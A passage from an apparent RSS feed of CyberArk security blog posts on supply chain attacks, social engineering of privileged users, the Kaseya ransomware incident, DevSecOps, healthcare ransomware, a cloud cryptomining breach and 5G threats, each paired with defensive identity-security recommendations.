Pay extra attention to cloud platforms that provide users with several levels of access options, many of which amount to yet another instance where a developer is overprivileged. The same least privilege rules and session isolation and monitoring processes applied in an on-premises environment need to be extended to the cloud, planning especially for the continued evaluation of how human and non-human entities are permissioned as well as for the heightened scale that the cloud can provide.

The Zero Trust Future-Present for Supply Chain Security

Securing the development pipeline — the heart of the digital supply chain — is not a one-time event. Just like the development of modern applications, security needs to be a continuous process and tackled in risk-prioritized phases. Security and Identity and Access Management (IAM) teams must constantly reassess permissions, regardless of whether developers (and their applications) are employing identity management frameworks or not. Organizations should assume no identity — person or machine — is to be trusted as part of a larger Zero Trust approach to security.

At the same time, application secrets need to be closely guarded. A vault that both encrypts application secrets and safeguards how those secrets are accessed is the last line of defense for any software supply chain.

The challenge and opportunity for security professionals is to present themselves as allies in the effort to secure the software supply chain. While CI/CD pipelines leverage more automation than ever, the fact of the matter is that developers are people too — people who have a profoundly powerful impact on the success of our organizations and whose identities and processes deserve the same level of security and operational considerations as any executive’s.

]]>
Attackers Are After Privileged Users. Do You Know Who They Are? https://www.cyberark.com/blog/attackers-are-after-privileged-users-do-you-know-who-they-are/ Tue, 13 Jul 2021 13:00:27 +0000 https://www.cyberark.com/?p=120707 Attackers are After Your Privileged Users. Do You Know Who They Are?

Attackers have more potential entry points into your organization than ever before. And many are brushing up on their acting skills, getting more creative and increasingly personal to spoof the most unsuspecting employees and launch their attacks.

New IDSA Survey Indicates Decreased Confidence in Securing Employee Identities  

Nearly every part of daily life — at home and work — turned upside down last year. The global shift to remote work and eLearning, large-scale investments in SaaS and cloud services and strong focus on digital transformation has brought a surge in newfound technologies and identities.

According to the “2021 Trends in Securing Digital Identities” survey from Identity Defined Security Alliance (IDSA), 83% of IT security and identity professionals experienced an increase in identities since last year, with one in five (20%) reporting that the number of identities they manage increased by more than 25%. Meanwhile, security teams’ confidence in their ability to secure employee identities dropped from 49% to 32%.

This decrease in confidence in securing employee identities is particularly interesting on several fronts.  First, the survey found that confidence levels in securing privileged users, customers and partners remained fairly steady. And in contrast, respondents reported increased confidence in securing machine identities, such as service accounts and applications. So why are employee identities, specifically, becoming harder to secure? Perhaps it’s because attackers are changing things up.

The New Faces of Privileged Users

One thing that hasn’t changed is the way attackers establish initial entry points into target organizations: credential theft methods like spear-phishing and impersonation are as popular as ever. In fact, the 2021 Verizon Data Breach Investigations Report (DBIR) found that 36% of all breaches last year involved phishing — up 11% from the previous year. Since employees are conducting more and more of their personal lives online, it’s becoming even easier for attackers to gather the necessary information required to execute their social engineering campaigns — monitoring public profiles and social media conversations to collect intel on everything from work routines to personal relationships, beliefs, motivations and more. After sizing them up, attackers often connect with their targets on social media and attempt to gain their trust.

What has changed are the individual targets of these social engineering attacks. Traditionally, adversaries focused their attention on IT admins with highly privileged access. But as the “The CISO View 2021 Survey: Zero Trust and Privileged Access” recently discovered, they’re going after new user populations, from executives and software developers to end-user employees — including business users with direct access to sensitive data or systems the attacker is interested in. Let’s review some of these new user populations and highlight examples of how they can become victims of social engineering attacks:

The Developer

This software engineer leads a team of developers at a leading financial institution, and her impressive list of technical certifications features prominently on her LinkedIn profile page. Outside of work, she’s building a large social media following of coders who flock to her channels for a mix of dry humor and deep programming know-how. A few months ago, a fellow developer connected with her on LinkedIn, referencing their shared interest in Python and Ruby programming languages. They soon became fast online friends. One day, this new friend mentions that a cousin is looking for a development job in the area. The software engineer promises to pass along her information and soon receives the cousin’s résumé in her work email. She clicks on the résumé and skims it before forwarding it to HR. Little does she know that her “friend” is really a cyber attacker who created a fake online persona and has spent months building a rapport with her in order to send that email, which contains malware cleverly disguised in the attachment. The developer’s LinkedIn profile, coupled with her daily social posts, helped the attacker gauge the high levels of access she likely had at her employer organization, and unintentionally, painted a target on her back.

It’s not just human developers that attackers are after. They know privileged credentials and secrets are often embedded directly into code and target application and machine identities as a way to launch attacks that can spread across customer-facing products — and in some cases — infect the entire digital supply chain.

In some instances, attackers are able to bypass the credential theft step altogether by impersonating an executive or third party to make direct requests for funds or data. Consider these next two business user examples:

The Middle Manager

This financial controller works at a large manufacturing organization. It’s Monday morning, and she’s just beginning her day. Coffee in hand, she opens an email marked “urgent” from the CEO of her company’s parent organization, which is located halfway around the world. He explains that the banks are closed for a holiday, and he needs to urgently wire funds to a third party to close a big deal. She’s suspicious, but the email looks legitimate and comes from the CEO’s verified email address.

Suddenly, her phone rings. It’s the CEO calling from overseas to follow up. He explains the situation again, providing all of the necessary information on the company and transaction. The financial controller follows protocol, getting a second team member to review the request and verify the details. Then, they authorize the wire transfer. Just a few hours later, they realize the call was a scam — and the company is out millions of dollars after trying unsuccessfully to cancel the transaction.

The Research Assistant

Working for a prominent biotech company, this researcher is developing a new lifesaving drug. His team collaborates with analysts in a partner healthcare organization, and each team member has access to large amounts of sensitive patient and medical data to fuel their research.

One day, he receives an email from a partner analyst asking him to send over the latest data. Since he works with this analyst regularly, he attaches the requested information without a second thought and hits “send.” However, this highly lucrative intellectual property hasn’t gone to his trusted research partner — instead, it’s now in the hands of a nation-state attacker.

End-Users are the New Privileged Path of Least Resistance to Valuable Systems and Data

Employee or contractors with high-value access are becoming more interesting targets for attackers for several reasons. Like everyone, they want to work smarter — not harder. Rather than breach an arbitrary workstation and then move around the network searching for a particular system, attackers can pursue more direct routes by precisely targeting individual end-users.

Emphasis has also shifted to end-users because it’s becoming more difficult to compromise IT admin accounts. Many organizations are aware that damaging breaches occur when attackers obtain powerful admin credentials and have put strong controls in place through a privileged access management system. What’s more, opportunities for lateral movement within the network are getting harder for attackers to find. As more organizations move to a Zero Trust model, more endpoints connect to resources directly rather than being given broad access.

Protecting End-User High-Value Access

The first step in protecting high-value access is identifying the employees and third parties who directly touch your company’s valuable systems. Depending on your organization, these could be financial systems, customer databases, product development systems or manufacturing processes.

Then, consider all of the ways these systems and data can be accessed by users: through what applications and infrastructure, interacting with which other types of users and using what devices?

From there, focus on implementing a strong mix of Identity Security controls, such as least privilege enforcement and adaptive MFA, along with targeted user training to raise awareness and strengthen security practices.

End User Protection Tips

To further explore the shifting privileged landscape and how to evolve your privileged access control strategy for a Zero Trust model, check out these practical recommendations from CISOs on the front lines.

]]>
In Kaseya Supply Chain Ransomware Attack History Repeats Itself https://www.cyberark.com/blog/in-kaseya-supply-chain-ransomware-attack-history-repeats-itself/ Wed, 07 Jul 2021 13:00:59 +0000 https://www.cyberark.com/?p=120263 In Kaseya Supply Chain Ransomware Attack History Repeats Itself

While many Americans took off early to jump-start the Independence Day weekend, cyber attackers were launching the single biggest ransomware attack in history. It’s estimated that at least 800 to 1,500 organizations — primarily managed service providers (MSPs) and their customers — have been impacted, and additional victims are still being identified. Law enforcement and government cybersecurity agencies involved in the ongoing investigation, including the Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA), are urging affected organizations to take immediate steps to implement cybersecurity best practices.

Initial Kaseya Infection Aims for Scale and Impact

The ransomware attack initially targeted Kaseya, an IT management software provider for MSPs and small-to-medium sized businesses. Based on initial reports, attackers likely identified and exploited a vulnerability to compromise Kaseya’s Virtual System Administrator (VSA) solution, which is used to remotely monitor and manage endpoints and servers.

With control over SaaS and on-premises Kaseya VSA servers — along with other MSP-managed on-premises servers — the threat actors pushed a phony software update containing the ransomware to all managed endpoints. Similar to the SolarWinds supply chain attack, the malware spread across Kaseya’s global customer base and their downstream customers. The potential breadth of the Kaseya attack “may make it so that we are unable to respond to each victim individually,” said the FBI in a statement.

The attackers claiming responsibility demanded a staggering $70 million ransomware payment from Kaseya to restore affected corporate and customer data. Meanwhile, organizations across the supply chain soon began to feel the ripple effects — from dental offices to accounting firms to restaurants. In Sweden, a major grocery store chain was forced to close hundreds of stores for days due to inoperative cash registers. In New Zealand, schools and more than 100 kindergartens went offline and had to resort to pen and paper. According to the New York Times, some victim organizations have been asked for as much as $5 million in ransom payments.

Echoes of Cloud Hopper Supply Chain Attack

Though details of this international ransomware campaign are still emerging, the attack patterns are reminiscent of the mega Cloud Hopper attack, a years-long cyber invasion that was first uncovered in 2016 and targeted the world’s largest technology service providers and their customers.

We asked Lavi Lazarovitz, senior director of Cyber Research at CyberArk Labs, about the similarities, and how ransomware operators are honing their craft to become more sophisticated, targeted, and persistent — sometimes conducting reconnaissance for several years before making a move.

“With Cloud Hopper, one compromised endpoint went on to impact hundreds of firms that had relationships with breached cloud providers. For one victim, the attack cycle continued for at least five years. In this attack, like the previous attack on SolarWinds, threat actors capitalized on automation and trust that provide the means by which malware can be distributed and deployed as a legitimate cooperate software,” he said.

He continued, “In the Kaseya incident, the attackers are focusing on the compromise of trusted software and trusted processes. Targeting trusted services allows the threat actors to leverage the trusted services’ granted permissions and access.”

Cloud Hopper, SolarWinds, Codecov, and many recent ransomware attacks have proven that traditional security boundaries are no longer enough. By targeting cloud service providers, adversaries can move fluidly between “isolated” environments and across multiple organizations with ease. Lateral movement is no longer restricted to one organization’s physical network — exponentially extending the attackers’ reach.

CISA and FBI Guidance for Ransomware Risk Mitigation

To help minimize attack impact and mitigate future risk, the CISA and FBI have issued guidance for MSPs and their customers affected by the Kaseya VSA supply chain ransomware attack.

Their recommendations include cybersecurity fundamentals, such as enabling multi-factor authentication (MFA) and enforcing the principle of least privilege. They align with the CyberArk Blueprint for Identity Security Success, a best practices framework to help disrupt and prevent the common identity attack chain. We encourage any organization seeking ways to bolster ransomware protections to give it a look, with emphasis on these three steps:

1. Implement or strengthen privileged access controls. Focusing on least privilege enforcement can help ensure both human and machine identities have the minimum levels of access required. Other effective privileged access controls, such as rotating privileged credentials and monitoring sessions, can help to quickly reduce risk.

2. Take a defense-in-depth approach to endpoint security. Ransomware operators exploit endpoint vulnerabilities to steal or encrypt confidential information. Deploying least privilege measures is an important part of a defense-in-depth strategy that helps prevent adversaries from moving laterally and potentially forcing them to use methods that expose their presence.

3. Enable multi-factor authentication (MFA). It’s one step that can block a majority of account compromise attacks. If access controls are already in place, consider strengthening them with adaptive MFA that uses AI to assign risk to each access event based on context and behavior.

The Kaseya VSA attack shows us yet again how ransomware supply chain attacks are increasing in frequency, sophistication, and scale. Now is the time to take proactive steps to secure your organization’s most valuable assets and stay a step ahead of attackers.

]]>
The DevSecOps Mission: Get Security ‘Right’ from the Start https://www.cyberark.com/blog/the-devsecops-mission-get-security-right-from-the-start/ Thu, 01 Jul 2021 13:00:31 +0000 https://www.cyberark.com/?p=119961 The DevSecOps Mission: Get Security ‘Right’ from the Start

The SolarWinds attack, along with others that have torn across supply chains in alarming succession since, has been a shock to so many systems (literally and figuratively). But by spotlighting ubiquitous software vulnerabilities and insecure development practices, it was also a catalyst for change. For many, it renewed a push toward cross-functional unity and integrated security that encapsulates the DevSecOps ideal.

Kurt Sand, CyberArk General Manager of DevSecOps, views the digital supply chain breach as nearly as useful as it was disruptive. “There are two things, in my view, that SolarWinds helped with,” Sand tells us. “One, it shifted emphasis from application security to the security of the development tools themselves. You cannot protect your applications without applying the same security rigor to the tools used to build them.” As for the second thing, the attack drove a lot of tough — but necessary — questions and organizational self-reflection, he says. “A number of boards started asking their CISOs or the CIOs, ‘What’s our DevSecOps strategy?’ As soon as that question starts to come from the top-down, it’s going to get attention.”

Keeping Security Front and Center Since Day One

Sand has seen the change in perception and attitude toward security evolve over time, throughout his own DevOps career. “I started as a software developer in sensitive military applications, which fostered a keen sense of security from day one on the job,” Sand says. Working on sonar and radar software developed for General Electric, he was subject to stringent security measures — including having to “sign out” anything printed from the office printer.

Over the years, Sand would notice the opposite happening in other, less “closed room” industries, where security would often be the first corner cut in the service of speed and hustle. Agile software methodologies were making it easier to build applications faster, but production couldn’t keep pace.

So, as Sand explains, the original idea behind DevOps was to “break that wall down so we could actually deliver software through operations at the speed of development.” Security was one more bottleneck development teams seemingly couldn’t afford.

“I don’t think that anyone intentionally meant for security to be left out,” Sand says. “For developers, it just wasn’t a focus. We were after: idea-to-production — or idea-to-customer faster.”

But as innovation ramped up, so did attackers’ efforts to undermine, manipulate and “crack” all this new software. It became clear that security was not only vital, it needed to be part of the whole process from Step One.

“Otherwise, we would just be pumping insecure software faster to production, only to end up with a costly mess that creates more work for everyone,” he says.

Today, the need for tightly integrated DevOps security is well understood, yet in many organizations, achieving “DevSecOps” is still somewhat of a holy grail. Reaching this “ideal state” ultimately boils down to people and culture — both of which take time, transparent communication, empathy and top-level support to change. It involves understanding how different groups operate and what skills are needed to bridge divides.

Finding Internal Security Champions

In the aftermath of SolarWinds and other attacks like Codecov, Sand believes there is another strong opportunity for organizations to drill down on how they address security as they work towards DevSecOps.

According to Sand, many organizations still tend to treat security like a quarterly mandatory gathering, an issue you focus on for 40 minutes and then continue about your day. It reinforces the idea that security is something outside the boundaries of most job descriptions, something most only have to be concerned with at certain times. But removing security concerns from the DevSecOps process entirely ends up making more work for everyone in the end.

Says Sand, “It’s like designing a house. After you’ve built it, it’s pretty hard to make changes. It’s easy to move the bathroom around when it’s on paper; it’s trickier when it’s already in place.”

That said, embedded security also, unintentionally, feeds into some developers’ view of security as a roadblock. And when security isn’t involved until the end of the development process, forcing them to make last-minute emergency fixes and slow delivery timelines, it’s easy to see why this misconception persists.

One step that organizations can take is to establish a “security champion” in every R&D team, someone who can maintain focus on mitigating vulnerabilities and potential problem spots, while also keeping in constant communication with others along the development pipeline. “You could call it a Center of Excellence” — although I prefer the term “Centers of Enablement” — a distinct team made up of people with specific areas of expertise,” Sand says. “These security champions meet and exchange best practices and bring them back to their individual teams. I’ve seen that be quite effective at actually pushing the security agenda into DevOps teams because one of their peers now owns that part of their responsibility.”

Taking the Security Steps Necessary for DevSecOps Success 

When it comes to developer engagement, security teams also need to re-think their messaging approach, says Sand. While there is use in encouraging development teams to think like attackers and anticipate potential issues, it’s more important to frame security in terms of overall project success. It’s one thing to say, “this code might have security issues” and quite another to say, “if you don’t pay attention to this, your entire project could fail.”

As Sand explains: “The thing that developers want more than anything is for ‘their baby’ to succeed, right? For their application to gain traction and customer confidence. So, companies need to educate their development teams on reported attacks stemming from software vulnerabilities and insecure coding practices. It’s an interesting way to build support.”

It’s part of how security teams can embrace (or at least better understand) the developer mindset, which is also something Sand has seen an increase in recently. While DevOps teams are developing more security-minded skillsets, it’s been even more noticeable how many security practitioners are — in Sand’s words, “modernizing” — and bringing their own development skills to the table. This is what Sand refers to as the “sweet spot.”

To put it in simpler terms, Sand would like to see security evolve into something that just “is” right from the start. “What DevSecOps seeks to do is just say, ‘Let’s keep doing DevOps but let’s use security all the way through from left to right.’”

]]>
Ransomware Is Why Healthcare Endpoint Security Needs Urgent Care https://www.cyberark.com/blog/ransomware-is-why-healthcare-endpoint-security-needs-urgent-care/ Tue, 29 Jun 2021 13:00:46 +0000 https://www.cyberark.com/?p=119855 Ransomware Attacks on Healthcare Endpoint Security

Throughout the pandemic, a wave of ransomware attacks disrupted operations in healthcare organizations around the world. As frontline workers fought to keep patients alive, many documented records by hand and struggled to deliver effective care in the absence of electronic patient health information (ePHI) and lifesaving, internet-connected medical equipment.

Universal Health Services, which operates 400 hospitals and facilities in the U.S. and U.K., suffered a particularly devastating blow in an attack that wiped out IT systems, postponed treatment and elective procedures, ultimately causing $67 million in lost revenue and reputation damage. After ransomware extortion took down Oregon-based Sky Lakes Medical Center’s systems, the hospital refused to pay the requested ransom but announced it would need to replace more than 2,000 computers and servers to “start fresh.” And an attack on a German hospital forced accident and emergency departments to close. An ambulance transporting a patient suffering from an aortic aneurysm was diverted to another hospital, delaying her treatment by an hour. She died shortly after. Later, prosecutors would launch a negligent homicide investigation, saying the ransomware attackers were to blame.

“If we don’t break the back of this cycle, a problem that’s already bad is going to get worse,” former Acting U.S. Deputy Attorney General John Carlin told the Wall Street Journal a few months ago. Looking back on the first half of 2021, this was a harbinger of things to come.

Ransomware Attacks on Healthcare Endpoint Security in 2020

Interconnected Healthcare Systems: Highly Vulnerable Targets

Healthcare data has long been an attractive target for attackers. Hospitals and other private healthcare organizations routinely store ePHI records, which include personally identifiable information (PII). These records must be compliant with many regulations and standards such as the Health Insurance Portability and Accountability Act (HIPAA). Yet due to widespread resource constraints and legacy system limitations, many health records are stored without proper security protections. And unlike other industries, healthcare organizations cannot delete patient records after specified periods of time; they must remain accessible (and secure) forever.

As portals to this sensitive data, the computers used within hospitals and healthcare systems are also major attack targets. Industrial-grade medical computers are often wheeled around the hospital floor by doctors and nurses to efficiently order and administer drugs, control medical devices that perform imaging scans or tests, and display diagnostic images and lab results. In many medical practices, computers are stationed in every room, giving providers fast access to ePHI records and facilitating communication among team members. And in operating theaters, computers play a critical role in pre-surgery planning, image visualization, patient monitoring and even robotic-assisted procedures.

Attackers are not stopping at commandeering these critical computers and servers. They’re also reaching for medical IoT devices with increasing frequency. For example, the WannaCry ransomware attack infected 1,200 diagnostic devices, and many more were taken offline to stop the spread.

While increasing ePHI, computer system and IoT device interconnectivity is helping providers transform the way they deliver care — adding even more challenges to the growing list of cybersecurity concerns.

When Downtime Isn’t an Option

Whether politically or financially motivated, attackers understand that in the business of life and death, healthcare organizations simply cannot afford to negotiate for days or weeks while their systems are held hostage. It’s estimated that ransoms totaling $15.6 million were demanded of U.S. healthcare organizations alone last year and that organizations paid a collective $2,112,744 to ransomware gangs. In reality, the total is likely much higher than what has been publicly reported. But even when organizations pay the requested ransom, there’s no guarantee that healthcare systems will be restored — or that the attackers won’t come back for more.

Operator-Based Ransomware and Double-Extortion Demands on the Rise

Ransomware attacks begin by exploiting configuration gaps and access vulnerabilities to deliver malware. These are often accomplished by using ransomware-as-a-service kits (ready to use and easy to find on the dark web) to infect unpatched systems using common phishing techniques, drive-by malware downloads, known public exploits or brute-force credential theft.

Yet over the past several months, CyberArk Labs and the CyberArk Red Team have tracked a significant rise in operator-based ransomware attacks that look a lot different than these opportunistic “spray and pray” attempts.

Operator-based ransomware attacks are executed by highly skilled threat actors who can target — and react to — the specific attack surfaces of a specific organization. In many cases, these attackers operate in stealth mode for extended periods of time, utilizing advanced TTPs to find and steal credentials for both cloud and on-premises infrastructure — especially those with elevated admin privileges on endpoints, such as Microsoft Windows or MacOS administrator accounts. Unfortunately, it’s no secret that in the healthcare industry, working as a privileged user (for example, a doctor making their rounds with a tablet that can access numerous patients’ medical records) or allowing a third-party vendor (for example, an insurance company or medical equipment supplier) to access a privileged system is all too common.

The attackers’ next objective is to harvest credentials for even higher privilege escalation and lateral movement, looking for more machines and more valuable data to extort. Once they’ve gained the necessary privileges, they often take the following steps:

  • First, they exfiltrate large amounts of sensitive data, such as PII.
  • Then, using high levels of privileged access and to avoid detection, they look for ways to “live off the land.” They take advantage of pre-installed programs and processes on a compromised endpoint that authorized privileged users, such as system admins, utilize often. By using the victim’s own tools against them, attackers appear legitimate, making it difficult for security teams to identify malicious activity. Plus, attackers don’t have to bother building or distributing new tools, which takes time and resources, and can raise red flags.
  • Finally, they execute their ransomware kit using built-in software distribution channels that the organization trusts and uses routinely. This is a highly effective tactic, as it allows the attackers to disable – or sometimes completely circumvent – existing security controls such as endpoint detection and response (EDR) or extended endpoint detection and response (XDR) tools.

Pay Up (Again) – Or We’ll Leak Your Patient Data, Too

During their attacks, ransomware threat actors look for ways to stealthily disrupt backups, delete shadow copies and unlock files to maximize their impact. In many virtual hostage situations, attackers will not only demand a ransom payment for decrypting target data but also threaten to leak it unless additional payment is made. According to F-Secure research, nearly 40% of ransomware families discovered in 2020 utilized such double-extortion methods.

Just last month, the FBI issued a report on a spike in Conti ransomware attacks targeting U.S. healthcare and first-responder networks. According to report authors, “If the ransom is not paid, the stolen data is sold or published to a public site controlled by the Conti actors. Ransom amounts vary widely and, we assess, are tailored to the victim. Recent ransom demands have been as high as $25 million.”

We’ll Be Back

You can also count on these savvy ransomware operators to think ahead. During their privilege escalation efforts, they often leave backdoors or hidden identities so they can re-enter the victim’s environment in the future. The U.K.’s National Cyber Security Centre (NCSC) recently shared a cautionary tale of an organization that paid millions in bitcoin to recover its files but failed to take necessary steps to identify the attack’s root cause and secure their network. As a result, the same attackers came back just two weeks later, using the same techniques to re-deploy the same ransomware, forcing the organization to pay the hefty ransom again.

How Healthcare Can Stay Ahead of Ransomware Attacks

As ransomware attacks become more sophisticated and highly targeted, healthcare organizations recognize the need to proactively ramp up their security posture to protect critical infrastructure and preserve patient care and trust.

National Institute of Standards and Technology (NIST) and HIPAA guidelines provide prescriptive recommendations to help strengthen defenses — and all echo the importance of least privilege, access and identity restrictions as the core foundation for a modern cybersecurity program based on Zero Trust.

That’s why identity-centric controls are so important to incorporate as part of a defense-in-depth endpoint security strategy, along with EDR and XDR, next-generation anti-virus (NGAV), data and network analysis, threat hunting and incident response tools. Not only can Identity Security solutions help detect and block the malware itself, but by “trusting nothing and verifying everything” they also work to stop identity and privilege abuse at critical points in the attack chain. As a result, threats can be found and stopped before they do harm. Once these controls are in place, healthcare organizations can focus on enhancing cybersecurity awareness and skills training, revisiting digital security fundamentals and hardening and backing up critical hospital systems to protect against future attacks.

To learn how your healthcare organization can reduce the endpoint attack surface by combining least privilege, ransomware protection, application control and other identity-centric capabilities, read our new eBook and get a jump-start with CyberArk Endpoint Privilege Manager – our SaaS solution proven to protect against 3 million strains of ransomware and counting.

]]>
Cryptomining Cloud Attack: Compromise Sensitive Console Access https://www.cyberark.com/blog/cryptomining-cloud-attack-compromise-sensitive-console-access/ Fri, 25 Jun 2021 13:00:04 +0000 https://www.cyberark.com/?p=119826 Examine a Cloud Cryptomining Attack

Remember how the Ocean’s Eleven crew couldn’t just attack one casino… they had to go for three? Well, the same goes for some cyber criminals who think, “Why stop at data theft when I can also hijack cloud resources for profit?” For many financially motivated attackers, more is more.

In this final piece of our real-world cloud attack series, we examine the breach of a high-profile organization that went straight for a sensitive management console in the cloud to orchestrate a sophisticated cryptomining scheme.

A Sophisticated Cryptomining Cloud Attack

Attack Phase 1: Entry

Attackers pinpointed and accessed a publicly exposed Kubernetes console that was not protected by a password or by multi-factor authentication (MFA). While this may sound like an egregious oversight, the truth is these powerful admin portals — whether they are specific cloud application development tools such as container orchestration platforms, or those used to manage all cloud projects and resources hosted by a specific cloud provider — are often overlooked and unintentionally exposed.

Attack Phase 2: Exploration

The attackers discovered that within one Kubernetes pod, access credentials were exposed to the company’s cloud environment, which contained a cloud database housing sensitive data. This included proprietary telemetry data used to monitor quality and performance and improve customer experiences.

Attack Phase 3: Exploitation 

The attackers commandeered the cloud console, ran scripts and used mining software to harness the company’s costly cloud resources to mine for cryptocurrency. To remain under the radar, they intentionally reduced CPU usage and masked their IP using a proxy server.

The Result

By appropriating compute resources, this attack ultimately cost the victim organization thousands of dollars in cloud services. And while cryptomining appears to have been their main goal, the attackers inevitably stumbled across some other “cloud goodies” along the way. These locally stored cloud access keys unlocked storage databases containing confidential information, including sensitive telemetry data on the company’s customers, which could have been used to damage the company’s brand and reputation.

To explore the full cryptomining attack chain, watch the video.

The “Elite Eleven” Cloud Identity Security Safeguards

Danny Ocean had his 11 accomplices, and fortunately, when it comes to protecting against attacks on identity in the cloud, we’ve got our own “elite eleven”— safeguards, that is.

From protecting against attacks that exploit cloud misconfigured identities, to those that hijack credentials embedded in code, to those that compromise sensitive console access, the following foundational steps can help you embrace a model of identity-centric security to drive resilience in the modern threat landscape. To explore all 11 recommendations, download this eBook.

1. Gain visibility into your permissions. As cloud adoption increases, so does the attack surface in the form of increasing permissions for business users and machine identities. To reduce risk, organizations must first get a strong handle on what cloud resources business users have access to, and when, and also identify ways to uncover hidden, unused and misconfigured permissions across your cloud footprint at scale.

2. Rotate and manage standing privileged credentials. Privileged credentials that provide employees, as well as third-party vendors, with 24/7 access to public cloud resources, consoles, security tools, RPA, automation tools, IT management and more must be protected with strong Privileged Access Management controls. Also consider just-in-time access to reduce standing privileges and overall risk exposure.

3. Strengthen access controls with MFA. Verifying that people are who they say they are may sound obvious, but it often goes wrong when organizations rely on only one verification method like a single set of credentials that are easily stolen or compromised. MFA plays an instrumental role in verifying user identities and preventing compromise — particularly when it comes to SaaS applications that are regularly accessed from outside the network.

4. Federate access to cloud resources like consoles, virtual machines and CLIs and authenticate with your preferred identity provider.

5. Implement least privilege throughout your cloud estate. This includes limiting access for highly privileged users and DevOps tool admins to demonstrate compliance with industry frameworks such as the Cloud Security Alliance’s Cloud Control Matrix.

Looking for additional guidance on protecting identity and privilege in the cloud? The CyberArk Blueprint for Identity Security Success provides a proven framework for assessing your current strategy and defining a roadmap for long-term success.

 

]]>
Preparing for the 5G Revolution Starts with Understanding Identity Security Threats https://www.cyberark.com/blog/preparing-for-the-5g-revolution-starts-with-understanding-identity-security-threats/ Tue, 22 Jun 2021 13:00:02 +0000 https://www.cyberark.com/?p=119516 Preparing for 5G Starts with Identity Security

The fifth generation of wireless technology — 5G for short — promises to redefine the network, as well as digital experiences as we know them. But with any rapid tech advancement, there’s also the certainty that 5G, which has been described as “a digital revolution” and “bridge to the future,” will open new opportunities for malicious disruption and cyber attacks. By 2025, 5G networks are expected to cover about half of the world’s population — so we should now be deeply exploring the new dimensions of potential implications and vulnerabilities it will create that could be exploited by cybercriminals and nation-states.

To help organizations navigate the evolving 5G threat landscape, U.S. government agencies including the National Security Agency (NSA), Office of the Director of National Intelligence (ODNI), and the Department of Homeland Security’s (DHS) Cybersecurity and Infrastructure Security Agency (CISA) recently published an analysis paper on potential threat vectors and new risks introduced by 5G adoption. We’ll summarize some of the major takeaways and share some high-level recommendations from our own team. But first, here’s a look at what 5G means for both consumers and industry players.

The Promise of 5G Connectivity

For consumers, 5G will usher in a new age of virtual experiences and digital content. It’s not just next-generation gaming, augmented reality, and immersive experiences that make 5G so exciting; faster speeds and lower latency will impact virtually every aspect of life. That includes the way we work. 5G is hyped to accelerate business’ digital transformations, drive internal efficiencies, and spark innovation. For communications services providers (CSPs) specifically, the opportunity to deliver new customer experiences and offerings is tremendous. The same is true for 5G network operators who will build and operate the systems architecture that underpins these new business models.

Inevitable Risks in the Wake of 5G Rollout

This transformational mobile bandwidth is coming online at the same time that the Internet of Things (IoT) is reaching critical mass. Yet by enabling a new wave of connected devices and services, the number and types of identities in an organization’s infrastructure will also expand.

Attackers often rely on compromising identities — linked to humans, devices, and applications — and subsequent manipulation of privileged credentials to reach their targets’ most sensitive data, applications, or infrastructure. Earlier this year, the Verkada IoT breach gave us a glimpse of what can happen when thousands of interconnected devices are not secured like other sensitive network assets. And as modern society relies on internet connectivity more than ever, the late 2020 revelations that Google was hit with a 2.5Tbps denial of service (DDoS) attack a few years back demonstrated what’s possible in terms of attack scale.

5G networks not only provide foundational connectivity for innumerable services but also transmit and store private data for consumers, businesses and government. This means that such attacks can reverberate far beyond the initial incident. And as the 5G roll-out intensifies, we can expect to see attacks become more frequent, sophisticated and larger in scale. It’s already happening: the telecom industry was the number one target of DDoS attacks in the first quarter of 2021.

NSA, ODNI and CISA Analysis of 5G Threat Vectors

The U.S. government’s recently released analysis paper, “The Potential Threat Vectors to 5G Infrastructure,” aims to inform stakeholders on cybersecurity risks and drive collaborative solutions. The paper digs into known and potential threats to the 5G environment, sample scenarios of where 5G may be adopted, and assessed risks to 5G core technologies. Here’s a look at two of the major threat vectors identified by authors, the 5G supply chain and systems architecture.

Securing the 5G Supply Chain

The global battle over 5G supremacy and the resulting rush to establish necessary 5G critical infrastructure has created a perfect opportunity for attackers to conduct cyber espionage campaigns, foreign interference, and other malicious activities. Authors note the entire 5G supply chain is susceptible to the introduction of risks such as “malicious software and hardware, counterfeit components, poor designs, manufacturing processes, and maintenance procedures.”

And the billions of connected 5G devices compound the problem. A single act of tampering at any point in the 5G supply chain could have a massive ripple effect. For example, business and home equipment like routers, smartphones, and IoT devices could be compromised en masse, while countries that purchase 5G equipment from companies with compromised supply chains could be vulnerable to interception, manipulation, disruption, or destruction of data.

Securing 5G Systems Architecture

Building out the critical 5G systems architecture that can meet the data, capacity, and communication requirements of the network requires a number of new technologies, such as software-defined networking, cloud-native infrastructure, network slicing, and edge computing. These tools, however, also serve to further increase the attack surface. While 5G component manufacturers and service providers are enhancing security through technology improvements, malicious actors can potentially exploit vulnerabilities — both legacy and those that are brand new — authors warn.

Privileged accounts and credentials provide superuser access to critical telecommunications infrastructure on-premises, in the cloud, and in hybrid environments. Yet too often, privileged access to critical systems is left unsecured and unmanaged. This puts assets at an increased risk of a damaging cyber attack that could impact telecommunications companies and citizens alike.

Six Identity Security Considerations for the 5G Era

An identity-centric approach to security emphasizes that privileged access management is critical to help address the gaps and vulnerabilities that attackers look to exploit in supply chain attacks — as well as strengthening the very core of 5G infrastructure.

Here are six key security considerations for telecommunications organizations and 5G architects to help improve their current security posture and mitigate the risk of future compromise:

1. Discover and manage credentials belonging to machine identities on IoT devices, as well as 5G component systems. Also, consider pre-supported integrations for managing privileged access to legacy infrastructure to enable interoperability. This will help prevent the malicious use of privileged accounts and credentials, the most common path to an organization’s most valuable assets.

2. Help prevent lateral movement across 5G networks by isolating and monitoring human-led privileged sessions to critical infrastructure.

3. Remove local admin rights and implement least privilege controls on all edge devices, endpoints, and servers to help defend against ransomware attacks. Similarly, enforce least privilege throughout public cloud infrastructure.

4. Work to ensure software is consistently patched and always up to date, especially in accordance with recent government guidance.

5. Continuously assess and improve the security of customer-facing products and services, with emphasis on the security practices of digital supply chain partners.

6. Consider investing in threat monitoring and anomaly detection technologies to monitor access activity and act on suspicious behavior in real time.

This is the dawning of the age of 5G and IoT, and with seemingly endless possibilities comes significant new risk. A strong defense will require an “assume breach” mindset, with a focus on protecting identities to prevent attackers from reaching their end goals.

 

]]>
How Federal Agencies Can Secure Secrets in Automation Environments at Scale https://www.cyberark.com/blog/how-federal-agencies-can-secure-secrets-in-automation-environments-at-scale/ Tue, 15 Jun 2021 17:33:50 +0000 https://www.cyberark.com/?p=119251 How Federal Agencies Can Secure Secrets in Automation Environments at Scale

